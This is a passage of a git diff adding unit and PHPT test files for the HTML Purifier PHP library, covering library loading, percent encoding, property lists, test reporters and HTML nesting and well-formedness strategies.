\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-with-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-with-autoload.phpt new file mode 100644 index 000000000..2b6f49d8c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto-without-spl-with-autoload.phpt @@ -0,0 +1,21 @@ +--TEST-- +HTMLPurifier.auto.php without spl_autoload_register but with userland +__autoload() defined test +--SKIPIF-- +<?php +if (function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() available"; +} +--FILE-- +<?php +function __autoload($class) { + echo "Autoloading $class... +"; + eval("class $class {}"); +} +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$purifier = new HTMLPurifier(); + +--EXPECT-- +Autoloading HTMLPurifier...
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto.phpt new file mode 100644 index 000000000..a4ea716f9 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/auto.phpt @@ -0,0 +1,11 @@ +--TEST-- +HTMLPurifier.auto.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.auto.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/error-auto-with-spl-nonstatic-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/error-auto-with-spl-nonstatic-autoload.phpt new file mode 100644 index 000000000..9a91abaf8 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/error-auto-with-spl-nonstatic-autoload.phpt @@ -0,0 +1,32 @@ +--TEST-- +Error when registering autoload with non-static autoload already on SPL stack +--SKIPIF-- +<?php +if (!function_exists('spl_autoload_register')) { + echo "skip - spl_autoload_register() not available"; +} +if (version_compare(PHP_VERSION, '5.2.11', '>=')) { + echo "skip - non-buggy version of PHP"; +} +--FILE-- +<?php +class NotStatic +{ + public function autoload($class) { + echo "Autoloading... $class" . PHP_EOL; + eval("class $class {}"); + } +} + +$obj = new NotStatic(); +spl_autoload_register(array($obj, 'autoload')); + +try { + require '../library/HTMLPurifier.auto.php'; +} catch (Exception $e) { + echo 'Caught error gracefully'; + assert('strpos($e->getMessage(), "44144") !== false'); +} + +--EXPECT-- +Caught error gracefully diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes-autoload.phpt new file mode 100644 index 000000000..6120956c6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes-autoload.phpt @@ -0,0 +1,14 @@ +--TEST-- +HTMLPurifier.path.php, HTMLPurifier.includes.php and HTMLPurifier.autoload.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.path.php'; +require 'HTMLPurifier.includes.php'; +require 'HTMLPurifier.autoload.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); + +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes.phpt new file mode 100644 index 000000000..681d51a96 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/path-includes.phpt @@ -0,0 +1,12 @@ +--TEST-- +HTMLPurifier.path.php and HTMLPurifier.includes.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.path.php'; +require 'HTMLPurifier.includes.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/safe-includes.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/safe-includes.phpt new file mode 100644 index 000000000..cb6f95d53 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/safe-includes.phpt @@ -0,0 +1,12 @@ +--TEST-- +HTMLPurifier.safe-includes.php loading test +--FILE-- +<?php +require_once '../library/HTMLPurifier.php'; // Tests for require_once +require_once '../library/HTMLPurifier.safe-includes.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-autoload.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-autoload.phpt new file mode 100644 index 000000000..36bb2efd7 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-autoload.phpt @@ -0,0 +1,12 @@ +--TEST-- +HTMLPurifier.standalone.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.standalone.php'; +require '../library/HTMLPurifier.autoload.php'; +require 'HTMLPurifier/PHPT/loading/_autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-with-prefix.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-with-prefix.phpt new file mode 100644 index 000000000..721dd7d17 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone-with-prefix.phpt @@ -0,0 +1,15 @@ +--TEST-- +HTMLPurifier.standalone.php with HTMLPURIFIER_PREFIX loading test +--FILE-- +<?php +define('HTMLPURIFIER_PREFIX', realpath('../library')); +require '../library/HTMLPurifier.path.php'; +require 'HTMLPurifier.standalone.php'; +require 'HTMLPurifier/Filter/YouTube.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +assert('in_array(realpath("../library/HTMLPurifier/Filter/YouTube.php"), get_included_files())'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone.phpt new file mode 100644 index 000000000..a4fe4f77d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/loading/standalone.phpt @@ -0,0 +1,13 @@ +--TEST-- +HTMLPurifier.standalone.php loading test +--FILE-- +<?php +require '../library/HTMLPurifier.standalone.php'; +require 'HTMLPurifier/Filter/YouTube.php'; +require 'HTMLPurifier/PHPT/loading/_no-autoload.inc'; +$config = HTMLPurifier_Config::createDefault(); +$purifier = new HTMLPurifier($config); +echo $purifier->purify('<b>Salsa!'); +assert('in_array(realpath("../library/standalone/HTMLPurifier/Filter/YouTube.php"), get_included_files())'); +--EXPECT-- +<b>Salsa!</b>
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/stub.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/stub.phpt new file mode 100644 index 000000000..e919c5763 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/stub.phpt @@ -0,0 +1,6 @@ +--TEST-- +PHPT testing framework smoketest +--FILE-- +Foobar +--EXPECT-- +Foobar
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/utf8.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/utf8.phpt new file mode 100644 index 000000000..87c20ef66 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/utf8.phpt @@ -0,0 +1,9 @@ +--TEST-- +UTF-8 smoketest +--FILE-- +<?php +require '../library/HTMLPurifier.auto.php'; +$purifier = new HTMLPurifier(); +echo $purifier->purify('太極拳, ЊЎЖ, لمنس'); +--EXPECT-- +太極拳, ЊЎЖ, لمنس
\ No newline at end of file diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PHPT/ze1_compatibility_mode.phpt b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/ze1_compatibility_mode.phpt new file mode 100644 index 000000000..606d7592e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PHPT/ze1_compatibility_mode.phpt @@ -0,0 +1,14 @@ +--TEST-- +Error with zend.ze1_compatibility_mode test +--PRESKIPIF-- +<?php +if (version_compare(PHP_VERSION, '5.3.0') >= 0) { + echo 'skip - ze1_compatibility_mode not present in PHP 5.3 or later'; +} +--INI-- +zend.ze1_compatibility_mode = 1 +--FILE-- +<?php +require '../library/HTMLPurifier.auto.php'; +--EXPECTF-- +Fatal error: HTML Purifier is not compatible with zend.ze1_compatibility_mode; please turn it off in %s diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PercentEncoderTest.php b/lib/htmlpurifier/tests/HTMLPurifier/PercentEncoderTest.php new file mode 100644 index 000000000..fa969de13 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PercentEncoderTest.php @@ -0,0 +1,63 @@ +<?php + +class HTMLPurifier_PercentEncoderTest extends HTMLPurifier_Harness +{ + + protected $PercentEncoder; + protected $func; + + function setUp() { + $this->PercentEncoder = new HTMLPurifier_PercentEncoder(); + $this->func = ''; + } + + function assertDecode($string, $expect = true) { + if ($expect === true) $expect = $string; + $this->assertIdentical($this->PercentEncoder->{$this->func}($string), $expect); + } + + function test_normalize() { + $this->func = 'normalize'; + + $this->assertDecode('Aw.../-$^8'); // no change + $this->assertDecode('%41%77%7E%2D%2E%5F', 'Aw~-._'); // decode unreserved chars + $this->assertDecode('%3A%2F%3F%23%5B%5D%40%21%24%26%27%28%29%2A%2B%2C%3B%3D'); // preserve reserved chars + $this->assertDecode('%2b', '%2B'); // normalize to uppercase + $this->assertDecode('%2B2B%3A3A'); // extra text + $this->assertDecode('%2b2B%4141', '%2B2BA41'); // extra text, with normalization + $this->assertDecode('%', '%25'); // normalize stray percent sign + $this->assertDecode('%5%25', '%255%25'); // permaturely terminated encoding + $this->assertDecode('%GJ', '%25GJ'); // invalid hexadecimal chars + + // contested behavior, if this changes, we'll also have to have + // outbound encoding + $this->assertDecode('%FC'); // not reserved or unreserved, preserve + + } + + function assertEncode($string, $expect = true, $preserve = false) { + if ($expect === true) $expect = $string; + $encoder = new HTMLPurifier_PercentEncoder($preserve); + $result = $encoder->encode($string); + $this->assertIdentical($result, $expect); + } + + function test_encode_noChange() { + $this->assertEncode('abc012-_~.'); + } + + function test_encode_encode() { + $this->assertEncode('>', '%3E'); + } + + function test_encode_preserve() { + $this->assertEncode('<>', '<%3E', '<'); + } + + function test_encode_low() { + $this->assertEncode("\1", '%01'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/PropertyListTest.php b/lib/htmlpurifier/tests/HTMLPurifier/PropertyListTest.php new file mode 100644 index 000000000..a2d4811ef --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/PropertyListTest.php @@ -0,0 +1,93 @@ +<?php + +class HTMLPurifier_PropertyListTest extends UnitTestCase +{ + + function testBasic() { + $plist = new HTMLPurifier_PropertyList(); + $plist->set('key', 'value'); + $this->assertIdentical($plist->get('key'), 'value'); + } + + function testNotFound() { + $this->expectException(new HTMLPurifier_Exception("Key 'key' not found")); + $plist = new HTMLPurifier_PropertyList(); + $plist->get('key'); + } + + function testRecursion() { + $parent_plist = new HTMLPurifier_PropertyList(); + $parent_plist->set('key', 'value'); + $plist = new HTMLPurifier_PropertyList(); + $plist->setParent($parent_plist); + $this->assertIdentical($plist->get('key'), 'value'); + } + + function testOverride() { + $parent_plist = new HTMLPurifier_PropertyList(); + $parent_plist->set('key', 'value'); + $plist = new HTMLPurifier_PropertyList(); + $plist->setParent($parent_plist); + $plist->set('key', 'value2'); + $this->assertIdentical($plist->get('key'), 'value2'); + } + + function testRecursionNotFound() { + $this->expectException(new HTMLPurifier_Exception("Key 'key' not found")); + $parent_plist = new HTMLPurifier_PropertyList(); + $plist = new HTMLPurifier_PropertyList(); + $plist->setParent($parent_plist); + $this->assertIdentical($plist->get('key'), 'value'); + } + + function testHas() { + $plist = new HTMLPurifier_PropertyList(); + $this->assertIdentical($plist->has('key'), false); + $plist->set('key', 'value'); + $this->assertIdentical($plist->has('key'), true); + } + + function testReset() { + $plist = new HTMLPurifier_PropertyList(); + $plist->set('key1', 'value'); + $plist->set('key2', 'value'); + $plist->set('key3', 'value'); + $this->assertIdentical($plist->has('key1'), true); + $this->assertIdentical($plist->has('key2'), true); + $this->assertIdentical($plist->has('key3'), true); + $plist->reset('key2'); + $this->assertIdentical($plist->has('key1'), true); + $this->assertIdentical($plist->has('key2'), false); + $this->assertIdentical($plist->has('key3'), true); + $plist->reset(); + $this->assertIdentical($plist->has('key1'), false); + $this->assertIdentical($plist->has('key2'), false); + $this->assertIdentical($plist->has('key3'), false); + } + + function testSquash() { + $parent = new HTMLPurifier_PropertyList(); + $parent->set('key1', 'hidden'); + $parent->set('key2', 2); + $plist = new HTMLPurifier_PropertyList($parent); + $plist->set('key1', 1); + $plist->set('key3', 3); + $this->assertIdentical( + $plist->squash(), + array('key1' => 1, 'key2' => 2, 'key3' => 3) + ); + // updates don't show up... + $plist->set('key2', 22); + $this->assertIdentical( + $plist->squash(), + array('key1' => 1, 'key2' => 2, 'key3' => 3) + ); + // until you force + $this->assertIdentical( + $plist->squash(true), + array('key1' => 1, 'key2' => 22, 'key3' => 3) + ); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/Reporter.php b/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/Reporter.php new file mode 100644 index 000000000..b9da9ab0b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/Reporter.php @@ -0,0 +1,60 @@ +<?php + +class HTMLPurifier_SimpleTest_Reporter extends HTMLReporter +{ + + protected $ac; + + public function __construct($encoding, $ac) { + $this->ac = $ac; + parent::__construct($encoding); + } + + public function paintHeader($test_name) { + parent::paintHeader($test_name); +?> +<form action="" method="get" id="select"> + <select name="f"> + <option value="" style="font-weight:bold;"<?php if(!$this->ac['file']) {echo ' selected';} ?>>All Tests</option> + <?php foreach($GLOBALS['HTMLPurifierTest']['Files'] as $file) { ?> + <option value="<?php echo $file ?>"<?php + if ($this->ac['file'] == $file) echo ' selected'; + ?>><?php echo $file ?></option> + <?php } ?> + </select> + <input type="checkbox" name="standalone" value="1" title="Standalone version?" <?php if($this->ac['standalone']) {echo 'checked="checked" ';} ?>/> + <input type="submit" value="Go"> +</form> +<?php + flush(); + } + + public function paintFooter($test_name) { + if (function_exists('xdebug_peak_memory_usage')) { + $max_mem = number_format(xdebug_peak_memory_usage()); + echo "<div>Max memory usage: $max_mem bytes</div>"; + } + parent::paintFooter($test_name); + } + + protected function getCss() { + $css = parent::getCss(); + $css .= ' + #select {position:absolute;top:0.2em;right:0.2em;} + '; + return $css; + } + + function getTestList() { + // hacky; depends on a specific implementation of paintPass, etc. + $list = parent::getTestList(); + $testcase = $list[1]; + if (class_exists($testcase, false)) $file = str_replace('_', '/', $testcase) . '.php'; + else $file = $testcase; + $list[1] = '<a href="index.php?file=' . $file . '">' . $testcase . '</a>'; + return $list; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/TextReporter.php b/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/TextReporter.php new file mode 100644 index 000000000..56204e7a3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/SimpleTest/TextReporter.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_SimpleTest_TextReporter extends TextReporter { + protected $verbose = false; + function __construct($AC) { + parent::__construct(); + $this->verbose = $AC['verbose']; + } + function paintPass($message) { + parent::paintPass($message); + if ($this->verbose) { + print 'Pass ' . $this->getPassCount() . ") $message\n"; + $breadcrumb = $this->getTestList(); + array_shift($breadcrumb); + print "\tin " . implode("\n\tin ", array_reverse($breadcrumb)); + print "\n"; + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CompositeTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CompositeTest.php new file mode 100644 index 000000000..8be422cc9 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CompositeTest.php @@ -0,0 +1,66 @@ +<?php + +class HTMLPurifier_Strategy_Composite_Test + extends HTMLPurifier_Strategy_Composite +{ + + public function __construct(&$strategies) { + $this->strategies =& $strategies; + } + +} + +// doesn't use Strategy harness +class HTMLPurifier_Strategy_CompositeTest extends HTMLPurifier_Harness +{ + + function test() { + + generate_mock_once('HTMLPurifier_Strategy'); + generate_mock_once('HTMLPurifier_Config'); + generate_mock_once('HTMLPurifier_Context'); + + // setup a bunch of mock strategies to inject into our composite test + + $mock_1 = new HTMLPurifier_StrategyMock(); + $mock_2 = new HTMLPurifier_StrategyMock(); + $mock_3 = new HTMLPurifier_StrategyMock(); + + // setup the object + + $strategies = array(&$mock_1, &$mock_2, &$mock_3); + $composite = new HTMLPurifier_Strategy_Composite_Test($strategies); + + // setup expectations + + $input_1 = 'This is raw data'; + $input_2 = 'Processed by 1'; + $input_3 = 'Processed by 1 and 2'; + $input_4 = 'Processed by 1, 2 and 3'; // expected output + + $config = new HTMLPurifier_ConfigMock(); + $context = new HTMLPurifier_ContextMock(); + + $params_1 = array($input_1, $config, $context); + $params_2 = array($input_2, $config, $context); + $params_3 = array($input_3, $config, $context); + + $mock_1->expectOnce('execute', $params_1); + $mock_1->setReturnValue('execute', $input_2, $params_1); + + $mock_2->expectOnce('execute', $params_2); + $mock_2->setReturnValue('execute', $input_3, $params_2); + + $mock_3->expectOnce('execute', $params_3); + $mock_3->setReturnValue('execute', $input_4, $params_3); + + // perform test + + $output = $composite->execute($input_1, $config, $context); + $this->assertIdentical($input_4, $output); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CoreTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CoreTest.php new file mode 100644 index 000000000..9bca5f60a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/CoreTest.php @@ -0,0 +1,45 @@ +<?php + +class HTMLPurifier_Strategy_CoreTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_Core(); + } + + function testBlankInput() { + $this->assertResult(''); + } + + function testMakeWellFormed() { + $this->assertResult( + '<b>Make well formed.', + '<b>Make well formed.</b>' + ); + } + + function testFixNesting() { + $this->assertResult( + '<b><div>Fix nesting.</div></b>', + '<b></b><div><b>Fix nesting.</b></div><b></b>' + ); + } + + function testRemoveForeignElements() { + $this->assertResult( + '<asdf>Foreign element removal.</asdf>', + 'Foreign element removal.' + ); + } + + function testFirstThree() { + $this->assertResult( + '<foo><b><div>All three.</div></b>', + '<b></b><div><b>All three.</b></div><b></b>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ErrorsHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ErrorsHarness.php new file mode 100644 index 000000000..0e1bca681 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ErrorsHarness.php @@ -0,0 +1,18 @@ +<?php + +class HTMLPurifier_Strategy_ErrorsHarness extends HTMLPurifier_ErrorsHarness +{ + + // needs to be defined + protected function getStrategy() {} + + protected function invoke($input) { + $strategy = $this->getStrategy(); + $lexer = new HTMLPurifier_Lexer_DirectLex(); + $tokens = $lexer->tokenizeHTML($input, $this->config, $this->context); + $strategy->execute($tokens, $this->config, $this->context); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNestingTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNestingTest.php new file mode 100644 index 000000000..9394352ec --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNestingTest.php @@ -0,0 +1,144 @@ +<?php + +class HTMLPurifier_Strategy_FixNestingTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_FixNesting(); + } + + function testPreserveInlineInRoot() { + $this->assertResult('<b>Bold text</b>'); + } + + function testPreserveInlineAndBlockInRoot() { + $this->assertResult('<a href="about:blank">Blank</a><div>Block</div>'); + } + + function testRemoveBlockInInline() { + $this->assertResult( + '<b><div>Illegal div.</div></b>', + '<b>Illegal div.</b>' + ); + } + + function testEscapeBlockInInline() { + $this->config->set('Core.EscapeInvalidChildren', true); + $this->assertResult( + '<b><div>Illegal div.</div></b>', + '<b><div>Illegal div.</div></b>' + ); + } + + function testRemoveNodeWithMissingRequiredElements() { + $this->assertResult('<ul></ul>', ''); + } + + function testListHandleIllegalPCDATA() { + $this->assertResult( + '<ul>Illegal text<li>Legal item</li></ul>', + '<ul><li>Illegal text</li><li>Legal item</li></ul>' + ); + } + + function testRemoveIllegalPCDATA() { + $this->assertResult( + '<table><tr>Illegal text<td></td></tr></table>', + '<table><tr><td></td></tr></table>' + ); + } + + function testCustomTableDefinition() { + $this->assertResult('<table><tr><td>Cell 1</td></tr></table>'); + } + + function testRemoveEmptyTable() { + $this->assertResult('<table></table>', ''); + } + + function testChameleonRemoveBlockInNodeInInline() { + $this->assertResult( + '<span><ins><div>Not allowed!</div></ins></span>', + '<span><ins>Not allowed!</ins></span>' + ); + } + + function testChameleonRemoveBlockInBlockNodeWithInlineContent() { + $this->assertResult( + '<h1><ins><div>Not allowed!</div></ins></h1>', + '<h1><ins>Not allowed!</ins></h1>' + ); + } + + function testNestedChameleonRemoveBlockInNodeWithInlineContent() { + $this->assertResult( + '<h1><ins><del><div>Not allowed!</div></del></ins></h1>', + '<h1><ins><del>Not allowed!</del></ins></h1>' + ); + } + + function testNestedChameleonPreserveBlockInBlock() { + $this->assertResult( + '<div><ins><del><div>Allowed!</div></del></ins></div>' + ); + } + + function testChameleonEscapeInvalidBlockInInline() { + $this->config->set('Core.EscapeInvalidChildren', true); + $this->assertResult( // alt config + '<span><ins><div>Not allowed!</div></ins></span>', + '<span><ins><div>Not allowed!</div></ins></span>' + ); + } + + function testExclusionsIntegration() { + // test exclusions + $this->assertResult( + '<a><span><a>Not allowed</a></span></a>', + '<a><span></span></a>' + ); + } + + function testPreserveInlineNodeInInlineRootNode() { + $this->config->set('HTML.Parent', 'span'); + $this->assertResult('<b>Bold</b>'); + } + + function testRemoveBlockNodeInInlineRootNode() { + $this->config->set('HTML.Parent', 'span'); + $this->assertResult('<div>Reject</div>', 'Reject'); + } + + function testInvalidParentError() { + // test fallback to div + $this->config->set('HTML.Parent', 'obviously-impossible'); + $this->config->set('Cache.DefinitionImpl', null); + $this->expectError('Cannot use unrecognized element as parent'); + $this->assertResult('<div>Accept</div>'); + } + + function testCascadingRemovalOfNodesMissingRequiredChildren() { + $this->assertResult('<table><tr></tr></table>', ''); + } + + function testCascadingRemovalSpecialCaseCannotScrollOneBack() { + $this->assertResult('<table><tr></tr><tr></tr></table>', ''); + } + + function testLotsOfCascadingRemovalOfNodes() { + $this->assertResult('<table><tbody><tr></tr><tr></tr></tbody><tr></tr><tr></tr></table>', ''); + } + + function testAdjacentRemovalOfNodeMissingRequiredChildren() { + $this->assertResult('<table></table><table></table>', ''); + } + + function testStrictBlockquoteInHTML401() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult('<blockquote>text</blockquote>', '<blockquote><p>text</p></blockquote>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNesting_ErrorsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNesting_ErrorsTest.php new file mode 100644 index 000000000..468480774 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/FixNesting_ErrorsTest.php @@ -0,0 +1,41 @@ +<?php + +class HTMLPurifier_Strategy_FixNesting_ErrorsTest extends HTMLPurifier_Strategy_ErrorsHarness +{ + + protected function getStrategy() { + return new HTMLPurifier_Strategy_FixNesting(); + } + + function testNodeRemoved() { + $this->expectErrorCollection(E_ERROR, 'Strategy_FixNesting: Node removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('ul', array(), 1)); + $this->invoke('<ul></ul>'); + } + + function testNodeExcluded() { + $this->expectErrorCollection(E_ERROR, 'Strategy_FixNesting: Node excluded'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('a', array(), 2)); + $this->invoke("<a>\n<a></a></a>"); + } + + function testNodeReorganized() { + $this->expectErrorCollection(E_WARNING, 'Strategy_FixNesting: Node reorganized'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('span', array(), 1)); + $this->invoke("<span>Valid<div>Invalid</div></span>"); + } + + function testNoNodeReorganizedForEmptyNode() { + $this->expectNoErrorCollection(); + $this->invoke("<span></span>"); + } + + function testNodeContentsRemoved() { + $this->expectErrorCollection(E_ERROR, 'Strategy_FixNesting: Node contents removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('span', array(), 1)); + $this->invoke("<span><div></div></span>"); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjector.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjector.php new file mode 100644 index 000000000..d1724bcb3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjector.php @@ -0,0 +1,18 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_EndInsertInjector extends HTMLPurifier_Injector +{ + public $name = 'EndInsertInjector'; + public $needed = array('span'); + public function handleEnd(&$token) { + if ($token->name == 'div') return; + $token = array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('Comment'), + new HTMLPurifier_Token_End('b'), + $token + ); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjectorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjectorTest.php new file mode 100644 index 000000000..72e833b71 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndInsertInjectorTest.php @@ -0,0 +1,38 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_EndInsertInjectorTest extends HTMLPurifier_StrategyHarness +{ + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + $this->config->set('AutoFormat.Custom', array( + new HTMLPurifier_Strategy_MakeWellFormed_EndInsertInjector() + )); + } + function testEmpty() { + $this->assertResult(''); + } + function testNormal() { + $this->assertResult('<i>Foo</i>', '<i>Foo<b>Comment</b></i>'); + } + function testEndOfDocumentProcessing() { + $this->assertResult('<i>Foo', '<i>Foo<b>Comment</b></i>'); + } + function testDoubleEndOfDocumentProcessing() { + $this->assertResult('<i><i>Foo', '<i><i>Foo<b>Comment</b></i><b>Comment</b></i>'); + } + function testEndOfNodeProcessing() { + $this->assertResult('<div><i>Foo</div>asdf', '<div><i>Foo<b>Comment</b></i></div><i>asdf<b>Comment</b></i>'); + } + function testEmptyToStartEndProcessing() { + $this->assertResult('<i />', '<i><b>Comment</b></i>'); + } + function testSpuriousEndTag() { + $this->assertResult('</i>', ''); + } + function testLessButStillSpuriousEndTag() { + $this->assertResult('<div></i></div>', '<div></div>'); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjector.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjector.php new file mode 100644 index 000000000..21c491436 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjector.php @@ -0,0 +1,29 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_EndRewindInjector extends HTMLPurifier_Injector +{ + public $name = 'EndRewindInjector'; + public $needed = array('span'); + public function handleElement(&$token) { + if (isset($token->_InjectorTest_EndRewindInjector_delete)) { + $token = false; + } + } + public function handleText(&$token) { + $token = false; + } + public function handleEnd(&$token) { + $i = null; + if ( + $this->backward($i, $prev) && + $prev instanceof HTMLPurifier_Token_Start && + $prev->name == 'span' + ) { + $token = false; + $prev->_InjectorTest_EndRewindInjector_delete = true; + $this->rewind($i); + } + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjectorTest.php 